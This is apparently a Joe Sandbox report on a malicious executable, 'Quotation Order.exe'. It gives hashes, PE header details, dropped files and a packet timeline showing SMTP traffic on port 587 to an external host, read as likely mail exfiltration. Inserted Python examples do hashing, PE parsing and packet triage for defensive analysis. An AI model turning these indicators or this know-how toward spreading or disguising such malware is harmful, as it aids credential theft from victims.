                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:4wzm9u/h4/YiCLuiq3crVdkwGdYCxUw/ATA:pmuhWYiCaivGWPwITA
                                                                                                                                                                                                                                                  MD5:D797AAE1EAF481E9C887482192B84109
                                                                                                                                                                                                                                                  SHA1:ACF58B4EB3F0FFDA9A2CD91DEF583422A11ED873
                                                                                                                                                                                                                                                  SHA-256:CBDA8606094D0493370B0F219EDABA9BE92444967AA9259D3E9323314DCA2DAA
                                                                                                                                                                                                                                                  SHA-512:605151432227A27E70C7884A7300E2CDA5450970A5BB67CB6139FB69EE1FACBE2DC95799905080456DB0549AA04E35870E4142AAFBCB60AA175F9526F3F7753C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........."...0.................. ....@...... ....................................`.........................................................................................B...8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H.......................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.0.1.2.3.4.5.6.7.8.9.H.........(%.....3.. ....}....*.-...}....*..d...%.~&....('...s(...zR.(%....(......}....*:.(......}....*..{....*:.{.... ......*2.{....s....*.. ...._,2(*.....d...%.~&....('.........%...l....(-...s(...z*"..(=...*..{....*:.(......}....*2.{....._...*v..-..{......_+..{.....`}....*2.{....._...*v..-..{......_+..{.....`}....*2.{....._...*v..-..{......_+..{.....`}....*6.{
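The dropped file directly above, written by Quotation Order.exe itself, carries the same MD5, SHA-1, SHA-256 and SHA-512 as the submitted sample and the same entropy of 7.72 bits per byte: it is a byte-for-byte copy of the sample under a new path, not a second-stage payload. Hash equality against the original is therefore the first check to run on every drop before spending analyst time on it, and whole-file entropy above roughly 7 bits per byte in a PE is the usual hint that most of the file is compressed or encrypted data rather than plain code. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it reproduces the digest and entropy fields the report lists per file and flags a drop that is merely a self-copy. The three byte strings are constructed stand-ins for the files and are not the real samples; SSDEEP and TLSH are left out because they need third-party libraries.

```python
import hashlib
import math
from collections import Counter

# Constructed stand-ins for the files in the report (hypothetical bytes, not the
# real Quotation Order.exe). For real files use: data = open(path, "rb").read()
SUBMITTED_SAMPLE = bytes(range(256)) * 64 + b"MZ" * 32   # dense byte mix, high entropy
DROPPED_COPY = bytes(SUBMITTED_SAMPLE)                    # the sample written back out under another name
DROPPED_OTHER = b"MZ" + b"\x00" * 4094                    # a small, mostly-zero drop

# bits/byte; whole-file entropy this high usually means compressed or encrypted payload
PACKED_THRESHOLD = 7.0


def digests(data: bytes) -> dict:
    """The four digests the report lists per file, as lower-case hex.
    SSDEEP and TLSH are omitted: they need third-party libraries."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the same scale as the report's
    'Entropy (8bit)': 0.0 for a constant file, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    # abs() turns the -0.0 of a single-valued file into a plain 0.0
    return abs(sum(c / n * math.log2(c / n) for c in Counter(data).values()))


def same_file(a: bytes, b: bytes) -> bool:
    """Byte-for-byte identity, established through all four digests."""
    return digests(a) == digests(b)


def triage(data: bytes, original: bytes) -> dict:
    """One dropped-file record in the shape of the report's entries, plus the
    two verdicts an analyst wants first: does it look packed, and is it just
    the original sample under a new name."""
    entropy = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": round(entropy, 3),
        "high_entropy": entropy >= PACKED_THRESHOLD,
        "self_copy": same_file(data, original),
        **digests(data),
    }


if __name__ == "__main__":
    for label, blob in (("dropped copy", DROPPED_COPY), ("other drop", DROPPED_OTHER)):
        print(label, triage(blob, SUBMITTED_SAMPLE))
```

Run against real files, `triage(open(drop, "rb").read(), open(sample, "rb").read())` gives the same fields as the report entry; a `self_copy` of True means the drop needs no further reversing, only its path and persistence mechanism need recording.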
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:modified
Size (bytes):338
Entropy (8bit):3.4679554894199565
Encrypted:false
SSDEEP:6:kKTSr87PiJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:LSrOkPlE99SCQl2DUevat
MD5:206FFE53D391FCA44F60892F6CA8CA10
SHA1:9BDE2FF7855CB848B7F729F8D7B850DD2CFFF282
SHA-256:8165D90C4E5C269F8EB1D8A6E29ED93B9E2AEB0F07970ED6659BFBE699A9D62E
SHA-512:23C36B63FA693A393C19005917B83C7CE7E4912E95D1BD4086822BE608654552F60F0829509EE90CF834E9B03780FED8D20477E923141D25F9745C4635DD3EAC
Malicious:false
Preview:p...... .........*......(................................................4..... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.296006462680174
Encrypted:false
SSDEEP:6144:041fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+lvmBMZJh1Vjc:p1/YCW2AoQ0Ni3vwMHrVQ
MD5:EEEE7F754DCBE040A43673AC871B6955
SHA1:BF35B3FE20F29C1842F6ED446EDC149C0D60840F
SHA-256:02F861CA952FE707EF4B1F246FFDED368F130EFBDEE36B4CCD4BD7E9E9A76EE0
SHA-512:291588396395E455862D714EFB217A5C4AC003FF0802A5240074FDE15E2CFC079EB825344924E67A5B72C60CAFF4E927E691426CCD09C801E8DFCD513423146F
Malicious:false
Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv6..................................................................................................................................................................................................................................................................................................................................................`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\System32\timeout.exe
File Type:ASCII text, with CRLF line terminators, with overstriking
Category:dropped
Size (bytes):60
Entropy (8bit):4.41440934524794
Encrypted:false
SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:3DD7DD37C304E70A7316FE43B69F421F
SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:false
Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):7.719141613124118
TrID:
• Win64 Executable Console Net Framework (206006/5) 48.58%
• Win64 Executable Console (202006/5) 47.64%
• Win64 Executable (generic) (12005/4) 2.83%
• Generic Win/DOS Executable (2004/3) 0.47%
• DOS Executable Generic (2002/1) 0.47%
File name:Quotation Order.exe
File size:912'780 bytes
MD5:d797aae1eaf481e9c887482192b84109
SHA1:acf58b4eb3f0ffda9a2cd91def583422a11ed873
SHA256:cbda8606094d0493370b0f219edaba9be92444967aa9259d3e9323314dca2daa
SHA512:605151432227a27e70c7884a7300e2cda5450970a5bb67cb6139fb69ee1facbe2dc95799905080456db0549aa04e35870e4142aafbcb60aa175f9526f3f7753c
SSDEEP:24576:4wzm9u/h4/YiCLuiq3crVdkwGdYCxUw/ATA:pmuhWYiCaivGWPwITA
TLSH:08150131D52D5B07E95F407CC54215C132BDD340B3EBEFA68AC29699A0837A5B234EEB
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....k..........."...0.................. ....@...... ....................................`................................
Icon Hash:90cececece8e8eb0
Entrypoint:0x400000
Entrypoint Section:
Digitally signed:false
Imagebase:0x400000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0xB06BE3BE [Wed Oct 17 15:31:10 2063 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:
Instruction (entry-point disassembly; these opcodes are the 32-bit decoding of the bytes 4D 5A 90 00 03 00 00 00 04 00 00 00, i.e. the start of the DOS header at file offset 0, which is what a managed image without a native entry point yields, so the listing is header data, not code)
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4e000          0xb9c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x4cf42          0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2000           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
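The header values above carry three triage signals worth checking by hand: a build timestamp decades in the future, a CLR header (COM_DESCRIPTOR) next to an empty import table, and an entry-point "disassembly" that is really the DOS header. As an added example that is not part of the Joe Sandbox report, the following Python reconstructs a PE32+ header from the report's own values and extracts those signals. It assumes AddressOfEntryPoint is 0 (the report does not list it; the DOS-header bytes in the Instruction listing are consistent with that), makes up a linker version and image base the report does not give, and uses the packet-table time (10:07 CEST, 08:07 UTC) as the analysis time. The point: a 2063 date on a managed image is what Roslyn's deterministic builds produce (a content hash is written into TimeDateStamp), so by itself it is a note rather than evidence of tampering, and CLR header plus no import table means the native entry-point listing is noise.

```python
"""PE32+ header triage reproducing the header values in the report above.
Added example, not Joe Sandbox code. The header bytes are constructed inline from the
report's values; sections, resources and code are omitted because the signals below
need only the COFF and optional headers."""
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF",
                       0x8000: "TERMINAL_SERVER_AWARE"}
DIR_IMPORT, DIR_RESOURCE, DIR_DEBUG, DIR_COM_DESCRIPTOR = 1, 2, 6, 14   # data-directory indices
COFF_FMT = "<HHIIIHH"                           # IMAGE_FILE_HEADER, 20 bytes
OPT_FMT = "<HBBIIIIIQIIHHHHHHIIIIHHQQQQII"     # IMAGE_OPTIONAL_HEADER64 without directories, 112 bytes

# Values taken from the report's PE header tables; entry_point=0 is an assumption
REPORT = dict(
    timestamp=0xB06BE3BE,
    file_chars=0x0002 | 0x0020,                 # EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    dll_chars=0x0020 | 0x0040 | 0x0100 | 0x0400 | 0x8000,
    entry_point=0,                              # assumed: listing shows DOS header bytes
    directories={DIR_RESOURCE: (0x4E000, 0xB9C), DIR_DEBUG: (0x4CF42, 0x38),
                 DIR_COM_DESCRIPTOR: (0x2000, 0x48)},
)


def build_header(timestamp, file_chars, dll_chars, entry_point, directories):
    """Assemble DOS header + 'PE\\0\\0' + COFF header + PE32+ optional header + 16 directories."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)       # e_lfanew: PE signature right after the DOS header
    coff = struct.pack(COFF_FMT, IMAGE_FILE_MACHINE_AMD64, 2, timestamp, 0, 0,
                       struct.calcsize(OPT_FMT) + 16 * 8, file_chars)
    # Linker version 48.0 and image base 0x140000000 are placeholders not in the report
    opt = struct.pack(OPT_FMT, 0x20B, 48, 0, 0x4B200, 0xC00, 0, entry_point, 0x2000,
                      0x140000000, 0x2000, 0x200, 4, 0, 4, 0, 4, 0, 0, 0x50000, 0x200, 0,
                      IMAGE_SUBSYSTEM_WINDOWS_CUI, dll_chars, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = b"".join(struct.pack("<II", *directories.get(i, (0, 0))) for i in range(16))
    return bytes(dos) + b"PE\0\0" + coff + opt + dirs


def triage(pe, analysis_time):
    """Return the header signals a triager checks before trusting anything else in the report."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    machine, _, ts, _, _, _, file_chars = struct.unpack_from(COFF_FMT, pe, e_lfanew + 4)
    opt_off = e_lfanew + 4 + struct.calcsize(COFF_FMT)
    opt = struct.unpack_from(OPT_FMT, pe, opt_off)
    if opt[0] != 0x20B:
        raise ValueError("only PE32+ handled here")
    entry_point, subsystem, dll_chars, ndirs = opt[6], opt[21], opt[22], opt[28]
    dir_off = opt_off + struct.calcsize(OPT_FMT)
    dirs = [struct.unpack_from("<II", pe, dir_off + 8 * i) for i in range(ndirs)]
    build_time = datetime.fromtimestamp(ts, tz=timezone.utc)
    has_clr = dirs[DIR_COM_DESCRIPTOR] != (0, 0)
    has_imports = dirs[DIR_IMPORT] != (0, 0)
    return {
        "machine": machine,
        "subsystem": subsystem,
        "build_time": build_time,
        # A future date is not by itself tampering: deterministic .NET builds write a
        # content hash into TimeDateStamp, so the decoded date carries no information.
        "timestamp_in_future": build_time > analysis_time,
        "file_characteristics": [n for bit, n in FILE_CHARACTERISTICS.items() if file_chars & bit],
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        # CLR header present and no import table: managed-only PE32+ image; the
        # 'native' disassembly at the entry point is then only the DOS header bytes.
        "managed_only": has_clr and not has_imports,
        "native_entry_meaningful": entry_point != 0,
    }


def report_sample(analysis_time=datetime(2024, 4, 26, 8, 7, 11, tzinfo=timezone.utc)):
    """Triage the header rebuilt from the report's values."""
    return triage(build_header(**REPORT), analysis_time)


if __name__ == "__main__":
    for key, value in report_sample().items():
        print(f"{key:25} {value}")
```

For a real file, replace `build_header(**REPORT)` with the bytes read from disk; the parser only needs the first few hundred bytes. The same check applied to a PE32 (magic 0x10B) image would need the 32-bit optional-header layout, which this example deliberately rejects rather than mis-parse.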
Name   Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
.text  0x2000           0x4b003       0x4b200   4680242039a56943972ed0435d39ae27  False     0.5189722857737105  data       6.37970302400105   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  0x4e000          0xb9c         0xc00     ffca2a01f256e191c5c80515b8a1a0d8  False     0.2942708333333333  data       4.152858131278967  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name         RVA      Size   Type                                                                                Language  Country        ZLIB Complexity
RT_VERSION   0x4e0b8  0x47c  data                                                                                                         0.48257839721254353
RT_VERSION   0x4e534  0x47c  data                                                                                English   United States  0.48257839721254353
RT_MANIFEST  0x4e9b0  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                           0.5489795918367347
Language of compilation system  Country where language is spoken  Map
English                         United States
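The packet table that follows is the report's TCP timeline; in the extracted page the port and address columns have run together into one digit string. As an added example, not Joe Sandbox code, the following Python recovers the five columns by constraint rather than by position and then groups packets per remote endpoint. Two assumptions are taken from the table itself: the analysis host is 192.168.2.10, and that host's side of every connection uses a port in Windows' default dynamic range (49152 to 65535); every cut of the digit string that violates either is discarded, and a row with more than one surviving cut is reported as ambiguous instead of guessed. The embedded sample is the table's first twelve rows. Run on them it separates two remote services: 208.95.112.1:80 (HTTP) and 192.254.225.166:587, which is SMTP submission, a port commonly used by stealers for mail-based exfiltration and therefore the flow to look at first.

```python
"""Parse Joe Sandbox's flattened TCP packet rows and summarise per-destination flows.
Added example, not Joe Sandbox code. Assumptions: the analysis host is 192.168.2.10
(taken from the table), rows are in the extracted form 'timestamp CEST<ports><ips>',
and the host's own ports fall in the Windows default dynamic range 49152-65535."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

LOCAL_IP = "192.168.2.10"          # analysis VM, as seen in the table
EPHEMERAL_MIN = 49152              # Windows default dynamic port range starts here
SERVICE_NOTES = {80: "HTTP", 587: "SMTP submission (mail-based exfiltration channel)"}

# Constructed sample: the first twelve rows of the packet table, copied verbatim
SAMPLE_ROWS = """\
Apr 26, 2024 10:07:11.190346003 CEST4970180192.168.2.10208.95.112.1
Apr 26, 2024 10:07:11.342407942 CEST8049701208.95.112.1192.168.2.10
Apr 26, 2024 10:07:11.342520952 CEST4970180192.168.2.10208.95.112.1
Apr 26, 2024 10:07:11.343307018 CEST4970180192.168.2.10208.95.112.1
Apr 26, 2024 10:07:11.499897003 CEST8049701208.95.112.1192.168.2.10
Apr 26, 2024 10:07:11.668257952 CEST4970180192.168.2.10208.95.112.1
Apr 26, 2024 10:07:12.971438885 CEST49703587192.168.2.10192.254.225.166
Apr 26, 2024 10:07:13.167594910 CEST58749703192.254.225.166192.168.2.10
Apr 26, 2024 10:07:13.167761087 CEST49703587192.168.2.10192.254.225.166
Apr 26, 2024 10:07:13.443326950 CEST58749703192.254.225.166192.168.2.10
Apr 26, 2024 10:07:13.443790913 CEST49703587192.168.2.10192.254.225.166
Apr 26, 2024 10:07:13.520519972 CEST4970580192.168.2.10208.95.112.1
""".splitlines()

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) CEST(?P<rest>[\d.]+)$")


@dataclass(frozen=True)
class Packet:
    ts: datetime
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def _valid_ip(s):
    parts = s.split(".")
    return len(parts) == 4 and all(p.isdigit() and (p == "0" or p[0] != "0") and int(p) <= 255
                                   for p in parts)


def _valid_port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535      # 1..65535, no leading zero


def _split_fields(rest, local_ip):
    """Enumerate every cut of '<sport><dport><sip><dip>' into valid fields and keep only
    those where exactly one endpoint is the analysis host and its port is ephemeral."""
    found = []
    for i in range(2, min(len(rest), 11)):                     # two ports: 2..10 digits
        ports, tail = rest[:i], rest[i:]
        if not ports.isdigit():
            continue
        for j in range(7, len(tail) - 6):                      # shortest IPv4 text is 7 chars
            sip, dip = tail[:j], tail[j:]
            if not (_valid_ip(sip) and _valid_ip(dip)) or (sip == local_ip) == (dip == local_ip):
                continue
            for k in range(1, len(ports)):
                sport, dport = ports[:k], ports[k:]
                if not (_valid_port(sport) and _valid_port(dport)):
                    continue
                local_port = int(sport) if sip == local_ip else int(dport)
                if local_port >= EPHEMERAL_MIN:
                    found.append((sip, int(sport), dip, int(dport)))
    return found


def parse_rows(rows, local_ip=LOCAL_IP):
    """Turn flattened rows into Packet records; refuse rows that do not parse uniquely."""
    packets = []
    for line in rows:
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unrecognised row: {line!r}")
        cands = _split_fields(m["rest"], local_ip)
        if len(cands) != 1:
            raise ValueError(f"{len(cands)} parses for row: {line!r}")
        sip, sport, dip, dport = cands[0]
        base, frac = m["ts"].rsplit(".", 1)                    # nanoseconds -> microseconds
        ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        packets.append(Packet(ts, sip, sport, dip, dport))
    return packets


def summarise(packets, local_ip=LOCAL_IP):
    """Group packets by remote (ip, port); count directions, sessions and the service."""
    flows = defaultdict(lambda: {"out": 0, "in": 0, "local_ports": set(), "first": None, "last": None})
    for p in packets:
        outbound = p.src_ip == local_ip
        key = (p.dst_ip, p.dst_port) if outbound else (p.src_ip, p.src_port)
        f = flows[key]
        f["out" if outbound else "in"] += 1
        f["local_ports"].add(p.src_port if outbound else p.dst_port)   # one local port per TCP session
        f["first"] = p.ts if f["first"] is None else min(f["first"], p.ts)
        f["last"] = p.ts if f["last"] is None else max(f["last"], p.ts)
        f["service"] = SERVICE_NOTES.get(key[1], "unknown")
    return dict(flows)


if __name__ == "__main__":
    for (ip, port), f in summarise(parse_rows(SAMPLE_ROWS)).items():
        print(f"{ip}:{port:<5} {f['service']:<50} out={f['out']} in={f['in']} "
              f"sessions={len(f['local_ports'])} {f['first'].time()}..{f['last'].time()}")
```

The constraint search is what makes the recovery safe: a greedy regex on the same rows would happily read "8049701" as port 80497 or split "192.168.2.10192.254..." at the wrong octet. Feeding the whole table through `parse_rows` also gives a quick session count per remote port (each distinct local port is one TCP connection), which is the number a triager wants when deciding whether the 587/tcp traffic was one delivery or a retry loop.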
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Apr 26, 2024 10:07:11.190346003 CEST  49701        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:11.342407942 CEST  80           49701      208.95.112.1     192.168.2.10
Apr 26, 2024 10:07:11.342520952 CEST  49701        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:11.343307018 CEST  49701        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:11.499897003 CEST  80           49701      208.95.112.1     192.168.2.10
Apr 26, 2024 10:07:11.668257952 CEST  49701        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:12.971438885 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:13.167594910 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:13.167761087 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:13.443326950 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:13.443790913 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:13.520519972 CEST  49705        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:13.640345097 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:13.640543938 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:13.672405958 CEST  80           49705      208.95.112.1     192.168.2.10
Apr 26, 2024 10:07:13.672481060 CEST  49705        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:13.768683910 CEST  49705        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:13.842605114 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:13.847892046 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:13.922867060 CEST  80           49705      208.95.112.1     192.168.2.10
Apr 26, 2024 10:07:14.059829950 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.059848070 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.059864044 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.059916973 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:14.079020977 CEST  49705        80         192.168.2.10     208.95.112.1
Apr 26, 2024 10:07:14.115319014 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:14.314491987 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.342559099 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:14.539053917 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.540128946 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:14.737171888 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.737504005 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:14.952049017 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:14.952373028 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.148571968 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.148808956 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.301546097 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.355247974 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.355493069 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.498054981 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.498140097 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.558037043 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.560062885 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560226917 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560269117 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560305119 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560328960 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560339928 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.560363054 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.745795012 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.745964050 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.756205082 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.756221056 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.756232977 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.756243944 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.756390095 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.757045031 CEST  587          49703      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.854598999 CEST  49703        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:15.942356110 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:15.943594933 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:16.141052008 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:16.161326885 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:16.370852947 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:16.370874882 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:16.370913982 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:16.370949030 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:16.373933077 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:16.571327925 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:16.667984962 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:18.689737082 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:18.886081934 CEST  587          49708      192.254.225.166  192.168.2.10
Apr 26, 2024 10:07:18.894439936 CEST  49708        587        192.168.2.10     192.254.225.166
Apr 26, 2024 10:07:19.091507912 CEST  587          49708      192.254.225.166  192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.096822977 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.294903994 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.300426006 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.496608973 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.499761105 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.708564997 CEST58749708192.254.225.166192.168.2.10
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.708825111 CEST49708587192.168.2.10192.254.225.166
                                                                                                                                                                                                                                                  Apr 26, 2024 10:07:19.904949903 CEST58749708192.254.225.166192.168.2.10
